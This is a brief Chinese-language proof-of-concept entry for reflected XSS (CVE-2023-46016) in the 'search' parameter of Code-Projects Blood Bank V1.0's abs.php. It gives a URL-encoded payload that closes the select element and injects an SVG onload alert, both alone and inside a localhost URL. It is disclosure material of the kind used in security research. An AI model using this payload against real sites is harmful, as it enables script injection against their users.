
针对 Code-Projects Blood Bank V1.0 中 abs.php 文件 'search' 参数的反射型 XSS 漏洞利用,包含 PoC 载荷及 CVE-2023-46016 文档。
%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3Ehttp://localhost/bloodbank/abs.php?search=%22%3E%3C/option%3E%20%3C/select%3E%3Cbr%3E%3Csvg/onload=alert(document.domain)%3E